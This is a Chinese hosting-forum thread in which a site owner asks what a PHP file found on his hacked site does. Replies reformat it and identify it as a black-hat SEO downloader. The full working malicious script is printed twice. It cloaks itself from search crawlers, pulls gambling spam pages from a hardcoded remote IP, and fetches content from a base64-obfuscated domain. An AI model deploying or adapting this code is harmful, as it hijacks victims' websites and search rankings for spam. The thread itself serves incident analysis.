设为首页收藏本站
切换到宽版

全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

全球主机交流论坛»论坛 主机综合交流 美国VPS综合讨论 网站被挂马了。这段代码什么意思
CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
返回列表 发新帖
查看: 2091|回复: 9
打印 上一主题 下一主题

[lighttpd] 网站被挂马了。这段代码什么意思

[复制链接]
左手写爱
跳转到指定楼层
1#
发表于 2016-9-8 10:21:04 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
今天查看一个很久没管的网站,发现百度site出来多一个文件夹,都是菠菜站,上FTP一看,单独一个文件夹,有个PHP文件,代码如下,是不是删除这个文件夹就可以了???
这个是用的虚拟主机,WIN2003的
<?php
define('s_u','http://108.186.234.233/');
define('m_i','1');
define('h_t',$_SERVER['SERVER_NAME']);
define('s_s','@Googlebot|EmbeddedWB|yahoo|MJ12bot|AhrefsBot|BLEXBot|EasouSpider|YandexBot|Exabot@i');
function r_k($l){$ch = array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9');$str='';for ($i = 0;$i <$l;$i++) {$str .= $ch[mt_rand(0,35)];}return $str;}
function g_c($url){$ch = curl_init();curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT,10);curl_setopt ($ch, CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko");return curl_exec($ch);}
class d58Cache {private $_unitNum = 999;private $_unitFloor = 3; private $_pix = '_';private $_now = 0;public $baseDir = ''; public $dirMode = 0777;
public function __construct($baseDir = null) {
if ($baseDir) {
$this->baseDir = $baseDir;} else {$this->baseDir = dirname(__FILE__) . DIRECTORY_SEPARATOR . '_Data';}if ($_SERVER['REQUEST_TIME']) {$this->_now = $_SERVER['REQUEST_TIME'];} else {$this->_now = time();}}public function isExists($id, $timeout = 0, $isCreate = false) {$file = $this->hashId($id);if (!is_file($file)) {if (is_file($file . '.lock')) {return 'LOCKED';}return false;}return true;}public function set($id, $data = null) {return $this->_writeFile($this->hashId($id), $this->_encode($data));}public function get($id, $lockread = false) {return $this->_decode($this->_readFile($this->hashId($id), $lockread));}public function del($id) {return $this->_deleteFile($this->hashId($id));}public function hashId($id) {if (!is_numeric($id)) {$id = $this->enId($id);$notNum = 'a'; }$id = $tid = $id;$hash = '';$pow = 0;for ($i = $this->_unitFloor; $i ; $i--) {$pow = pow($this->_unitNum, $i);$unit = floor($tid / $pow);if ($unit > $this->_unitNum) {$unit = $this->_unitNum;}$hash .= $this->_pix . $unit . DIRECTORY_SEPARATOR;$tid = $tid - $unit * $pow;}unset($pow, $tid, $unit, $i);return $this->baseDir . DIRECTORY_SEPARATOR . $hash . ($notNum) . $id . '.txt';}public function enId($data) {return sprintf('%011u', crc32($data));}private function _encode($data) {$array = array('source' => $data);return '<?php die(\'Cache Page by d58Cache.\') ?>' . serialize($array);}protected function _decode($data) {$array = unserialize($data);return $array['source'];}protected function _writeFile($file, $data) {$dir = dirname($file);if (!is_dir($dir)) {mkdir($dir, $this->dirMode, true);}if (!is_file($file) && is_file($file . '.lock')){return false;}$mqr = get_magic_quotes_runtime();set_magic_quotes_runtime(0);$re = @ file_put_contents($file, $data, LOCK_EX); set_magic_quotes_runtime($mqr);return $re;}protected function _readFile($file, $lockread = false) {if (!is_file($file)){if (!$lockread) {return false;}$file .= '.lock'; if (!is_file($file)) {return false;}}return file_get_contents($file, null, null, 39);}protected function _deleteFile($file) {if (is_file($file)){return unlink($file);}return false;}public function lock($id) {$file = $this->hashId($id);if (!is_file($file) && is_file($file . '.lock')){return true;}return rename($file, $file . '.lock');}public function unlock($id) {$file = $this->hashId($id);if (is_file($file) && !is_file($file . '.lock')){return true;}return rename( $file . '.lock', $file);}}
function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{$d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$diconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_l(){return "?".r_k(4).'/'.r_k(mt_rand(4,6)).'.html';}
set_time_limit(20);error_reporting(0);function r_c(){global $b1,$b1s;return trim($b1[mt_rand(0,$b1s)]);}
define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);
if(preg_match(s_s,u_s)){
header('HTTP/1.1 503 Service Temporarily Unavailable');
echo '对不起,页面维护中,请稍后访问!';
die;
}else {
header('HTTP/1.1 200 OK');
$cache = new d58Cache();
$_pa=explode('/',$_SERVER['PHP_SELF']);
$_mp=str_replace(end($_pa),'',$_SERVER['PHP_SELF']);
define('m_l',$_mp);
define('h_z',s_p());
$m_d=md5(h_z);if ($cache -> isExists($m_d)){$d_c = $cache -> get($m_d);}else{$d_u=s_u.'?mi='.m_i.'&xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_u.='&ml='.bin2hex(m_l);$d_c=g_c($d_u);if(!stristr(h_z,"sitemap.")) $cache -> set($m_d,$d_c);}
if(!is_file("b.txt")){$btdb=g_c("http://s1".base64_decode("LmQ1OC5uZXQvcy8=")."getbt.php");if(!$btdb) $btdb=g_c("http://s2".base64_decode("LmQ1OC5uZXQvcy8=")."/getbt.php");
if(trim($btdb)){$bts=fopen("b.txt","w");fwrite($bts,trim(mb_convert_encoding($btdb,'gbk','utf-8')));fclose($bts);}}
$b1=file('b.txt');$b1s=ceil(count($b1)-1);$d_c=preg_replace_callback("/{link}/iUs", "r_l",$d_c);$d_c=preg_replace_callback("/{name}/iUs", "r_c",$d_c);echo $d_c;}
?>
网站

相关帖子
回复

举报

the2ndface
推荐
发表于 2016-9-8 11:13:18 | 只看该作者
排了半天的版。。为毛最后多个括号
  1. <?php
  2. define('s_u','http://108.186.234.233/');
  3. define('m_i','1');
  4. define('h_t',$_SERVER['SERVER_NAME']);
  5. define('s_s','@Googlebot|EmbeddedWB|yahoo|MJ12bot|AhrefsBot|BLEXBot|EasouSpider|YandexBot|Exabot@i');

  7.         function r_k($l){
  8.                 $ch = array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9');
  9.                 $str='';
  10.                 for ($i = 0;$i <$l;$i++) {
  11.                         $str .= $ch[mt_rand(0,35)];
  12.                 }return $str;
  13.         }

  15.         function g_c($url){
  16.                 $ch = curl_init();
  17.                 curl_setopt ($ch, CURLOPT_URL, $url);
  18.                 curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  19.                 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT,10);
  20.                 curl_setopt ($ch, CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko");
  21.                 return curl_exec($ch);
  22.         }

  24. class d58Cache {
  25.         private $_unitNum = 999;
  26.         private $_unitFloor = 3;
  27.         private $_pix = '_';
  28.         private $_now = 0;
  29.         public $baseDir = '';
  30.         public $dirMode = 0777;

  32.         public function __construct($baseDir = null) {
  33.                 if ($baseDir) {
  34.                         $this->baseDir = $baseDir;
  35.                 } else {
  36.                         $this->baseDir = dirname(__FILE__) . DIRECTORY_SEPARATOR . '_Data';
  37.                 }
  38.                 if ($_SERVER['REQUEST_TIME']) {
  39.                         $this->_now = $_SERVER['REQUEST_TIME'];
  40.                 } else {
  41.                         $this->_now = time();
  42.                 }
  43.         }

  45.         public function isExists($id, $timeout = 0, $isCreate = false) {
  46.                 $file = $this->hashId($id);
  47.                 if (!is_file($file)) {
  48.                         if (is_file($file . '.lock')) {
  49.                                 return 'LOCKED';
  50.                         }
  51.                         return false;
  52.                 }
  53.                 return true;
  54.         }

  56.         public function set($id, $data = null) {
  57.                 return $this->_writeFile($this->hashId($id), $this->_encode($data));
  58.         }

  60.         public function get($id, $lockread = false) {
  61.                 return $this->_decode($this->_readFile($this->hashId($id), $lockread));
  62.         }

  64.         public function del($id) {
  65.                 return $this->_deleteFile($this->hashId($id));
  66.         }

  68.         public function hashId($id) {
  69.                 if (!is_numeric($id)) {
  70.                         $id = $this->enId($id);
  71.                         $notNum = 'a';
  72.                 }
  73.                 $id = $tid = $id;
  74.                 $hash = '';
  75.                 $pow = 0;
  76.                 for ($i = $this->_unitFloor; $i ; $i--) {
  77.                         $pow = pow($this->_unitNum, $i);
  78.                         $unit = floor($tid / $pow);
  79.                         if ($unit > $this->_unitNum) {
  80.                                 $unit = $this->_unitNum;
  81.                         }
  82.                         $hash .= $this->_pix . $unit . DIRECTORY_SEPARATOR;
  83.                         $tid = $tid - $unit * $pow;
  84.                 }
  85.                 unset($pow, $tid, $unit, $i);
  86.                 return $this->baseDir . DIRECTORY_SEPARATOR . $hash . ($notNum) . $id . '.txt';
  87.         }

  89.         public function enId($data) {
  90.                 return sprintf('%011u', crc32($data));
  91.         }

  93.         private function _encode($data) {
  94.                 $array = array('source' => $data);
  95.                 return '<?php die(\'Cache Page by d58Cache.\') ?>' . serialize($array);
  96.         }

  98.         protected function _decode($data) {
  99.                 $array = unserialize($data);
  100.                 return $array['source'];
  101.         }

  103.         protected function _writeFile($file, $data) {
  104.                 $dir = dirname($file);
  105.                 if (!is_dir($dir)) {
  106.                         mkdir($dir, $this->dirMode, true);
  107.                 }
  108.                 if (!is_file($file) && is_file($file . '.lock')){
  109.                         return false;
  110.                 }
  111.                 $mqr = get_magic_quotes_runtime();
  112.                 set_magic_quotes_runtime(0);
  113.                 $re = @ file_put_contents($file, $data, LOCK_EX);
  114.                 set_magic_quotes_runtime($mqr);return $re;
  115.         }

  117.         protected function _readFile($file, $lockread = false) {
  118.                 if (!is_file($file)){
  119.                         if (!$lockread) {
  120.                         return false;
  121.                         }
  122.                 $file .= '.lock';
  123.                 if (!is_file($file)) {
  124.                         return false;
  125.                         }
  126.                 }
  127.                 return file_get_contents($file, null, null, 39);
  128.         }

  130.         protected function _deleteFile($file) {
  131.                 if (is_file($file)){
  132.                         return unlink($file);
  133.                 }
  134.                 return false;
  135.         }

  137.         public function lock($id) {
  138.                 $file = $this->hashId($id);
  139.                 if (!is_file($file) && is_file($file . '.lock')){
  140.                         return true;
  141.                 }
  142.                 return rename($file, $file . '.lock');
  143.         }

  145.         public function unlock($id) {
  146.                 $file = $this->hashId($id);
  147.                 if (is_file($file) && !is_file($file . '.lock')){
  148.                         return true;
  149.                 }
  150.                 return rename( $file . '.lock', $file);
  151.         }
  152. }

  154. function s_p(){
  155.         $d='';
  156.         if(isset($_SERVER['REQUEST_URI'])){
  157.                 $d=$_SERVER['REQUEST_URI'];
  158.         }
  159.         else{
  160.                 if(isset($_SERVER['argv'])){
  161.                         $d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];
  162.                 }else{
  163.                         $d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];
  164.                 }
  165.         }
  166.         if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){
  167.                 if(function_exists('mb_convert_encoding')){
  168.                         $d=mb_convert_encoding($d,'UTF-8','GBK');
  169.                 }else{
  170.                         $d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$diconv('GBK','UTF-8',$d);
  171.                 }
  172.         }
  173.         $r=explode('#',$d,2);
  174.         $d=$r[0];return $d;
  175. }

  177.         function r_l(){
  178.                 return "?".r_k(4).'/'.r_k(mt_rand(4,6)).'.html';
  179.         }

  181.         set_time_limit(20);
  182.         error_reporting(0);

  184.         function r_c(){
  185.                 global $b1,$b1s;
  186.                 return trim($b1[mt_rand(0,$b1s)]);
  187.         }

  189.         define('r_s',$_SERVER['HTTP_REFERER']);
  190.         define('u_s',$_SERVER['HTTP_USER_AGENT']);

  192.         if(preg_match(s_s,u_s)){
  193.                 header('HTTP/1.1 503 Service Temporarily Unavailable');
  194.                 echo '对不起,页面维护中,请稍后访问!';
  195.                 die;
  196.         }else {
  197.                 header('HTTP/1.1 200 OK');
  198.                 $cache = new d58Cache();
  199.                 $_pa=explode('/',$_SERVER['PHP_SELF']);
  200.                 $_mp=str_replace(end($_pa),'',$_SERVER['PHP_SELF']);
  201.                 define('m_l',$_mp);
  202.                 define('h_z',s_p());
  203.                 $m_d=md5(h_z);
  204.                 if ($cache -> isExists($m_d)){
  205.                         $d_c = $cache -> get($m_d);
  206.                 }else{
  207.                         $d_u=s_u.'?mi='.m_i.'&xu='.bin2hex(h_z);
  208.                         $d_u.='&xh='.bin2hex(h_t);
  209.                         $d_u.='&ml='.bin2hex(m_l);
  210.                         $d_c=g_c($d_u);
  211.                         if(!stristr(h_z,"sitemap.")) $cache -> set($m_d,$d_c);
  212.                 }

  214.         if(!is_file("b.txt")){
  215.                 $btdb=g_c("http://s1".base64_decode("LmQ1OC5uZXQvcy8=")."getbt.php");
  216.                 if(!$btdb) $btdb=g_c("http://s2".base64_decode("LmQ1OC5uZXQvcy8=")."/getbt.php");
  217.                 if(trim($btdb)){
  218.                         $bts=fopen("b.txt","w");
  219.                         fwrite($bts,trim(mb_convert_encoding($btdb,'gbk','utf-8')));
  220.                         fclose($bts);
  221.                 }
  222.         }

  224.         $b1=file('b.txt');
  225.         $b1s=ceil(count($b1)-1);
  226.         $d_c=preg_replace_callback("/{link}/iUs", "r_l",$d_c);
  227.         $d_c=preg_replace_callback("/{name}/iUs", "r_c",$d_c);
  228.         echo $d_c;
  229.         }
  230. ?>
复制代码

点评

roppl
66666666  发表于 2016-9-8 12:42
回复 支持 1 反对 0

举报

左手写爱
9#
 楼主| 发表于 2016-9-8 15:12:42 | 只看该作者
嘉靖 发表于 2016-9-8 15:08
做收录?

嗯  应该是的     我说以前排名挺好的没注意怎么没排名了

一堆目录菠菜
回复 支持 反对

举报

sora
7#
发表于 2016-9-8 11:25:48 | 只看该作者
s1点d58点net/s/getbt.php
好多文章标题.
回复 支持 反对

举报

etotakeo
6#
发表于 2016-9-8 11:25:30 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

举报

左手写爱
5#
 楼主| 发表于 2016-9-8 11:16:32 | 只看该作者
fgpgy 发表于 2016-9-8 10:43
黑帽吧,下载者,会在你网站目录下生成他们需要的文件 应该

正在删除,几万个TXT文档  囧
回复 支持 反对

举报

fgpgy
3#
发表于 2016-9-8 10:43:49 | 只看该作者
黑帽吧,下载者,会在你网站目录下生成他们需要的文件 应该
回复 支持 反对

举报

almostsir
2#
发表于 2016-9-8 10:41:14 | 只看该作者
对PHP看不懂
回复 支持 反对

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-11-4 17:55 , Processed in 0.097193 second(s), 14 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表